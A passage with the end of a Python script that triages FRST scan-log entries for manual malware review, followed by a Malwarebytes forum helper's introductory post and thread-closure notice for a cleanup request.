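    """Parse one entry line; headers, blanks and other text return None."""
    m = FRST_LINE.match(line.strip())
    if not m:
        return None
    pub = m.group("publisher")
    publisher = pub.strip() or None if pub is not None else None  # "()" -> None
    return Entry(m.group("created"), m.group("modified"), int(m.group("size")),
                 m.group("attrs"), publisher, m.group("path"))


def triage(entry: Entry) -> List[str]:
    """Reasons an entry deserves manual review (hash it, check its signature).
    An empty list means nothing notable; a hit is a prompt, not a verdict."""
    reasons: List[str] = []
    low = entry.path.lower()
    if entry.is_dir:
        # Legitimate installers rarely create a directory directly under the drive root.
        if re.fullmatch(r"[a-z]:\\[^\\]+", low):
            reasons.append("new directory directly under the drive root")
        return reasons
    if not low.endswith(EXEC_EXT):
        return reasons
    if low.endswith(PE_EXT) and entry.publisher is None:
        reasons.append("PE file with no publisher/version information")
    if any(d in low for d in SUSPECT_DIRS):
        reasons.append("executable in a user-writable or temp location")
    if entry.is_hidden:
        reasons.append("executable marked hidden")
    if entry.size == 0:
        reasons.append("zero-byte executable")
    return reasons


def review_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run triage over raw FRST lines, keeping only entries with at least one reason."""
    findings = []
    for line in lines:
        entry = parse_frst_line(line)
        if entry is not None:
            reasons = triage(entry)
            if reasons:
                findings.append((entry.path, reasons))
    return findings


# Constructed sample in the FRST format (not copied from a real system).
SAMPLE_LINES = [
    "==================== One Month Created files and folders ========",
    "2017-07-30 02:35 - 2017-07-30 10:37 - 00045472 _____ (Malwarebytes) C:\\Windows\\system32\\Drivers\\mbam.sys",
    "2017-07-30 01:11 - 2017-07-30 01:11 - 00000000 ____D C:\\Windows\\system32\\tmp",
    "2017-07-30 01:12 - 2017-07-30 01:12 - 00412160 ____H C:\\Windows\\system32\\tmp\\inst.exe",
    "2017-07-30 01:13 - 2017-07-30 01:13 - 00000000 ____D C:\\sh4ldr",
    "2017-07-30 01:09 - 2017-07-30 02:23 - 00180224 _____ C:\\Users\\Public\\Documents\\update.exe",
    "2017-07-21 20:41 - 2017-06-28 05:38 - 01903040 _____ (NVIDIA Corporation) C:\\Windows\\system32\\nvspcap64.dll",
]

if __name__ == "__main__":
    for path, reasons in review_log(SAMPLE_LINES):
        print(path + "\n    " + "\n    ".join(reasons))
```

Run on the sample, only the hidden executable under `system32\tmp`, the root-level `C:\sh4ldr` directory and the unsigned `update.exe` in `Users\Public` are reported; the Malwarebytes and NVIDIA entries pass because they carry a publisher and live where drivers belong. The publisher field is only a hint: FRST prints it from the file's version resource, which anyone can set, so a reported item still needs its hash and signature checked.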

Hi Runez :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.

  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system: I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of it as fast as we can, before it makes unknown changes to the system. This being said, I would appreciate it if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums' rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate it if you let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate it if you stayed with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;

This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread.

This being said, it's time to clean up some malware, so let's get started, shall we? :)

Follow the instructions in the thread below, and provide me both FRST logs (FRST.txt and Addition.txt). You can attach them in your next post, or copy/paste their content.

https://forums.malwarebytes.com/topic/9573-im-infected-what-do-i-do-now/


Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread. Thanks!
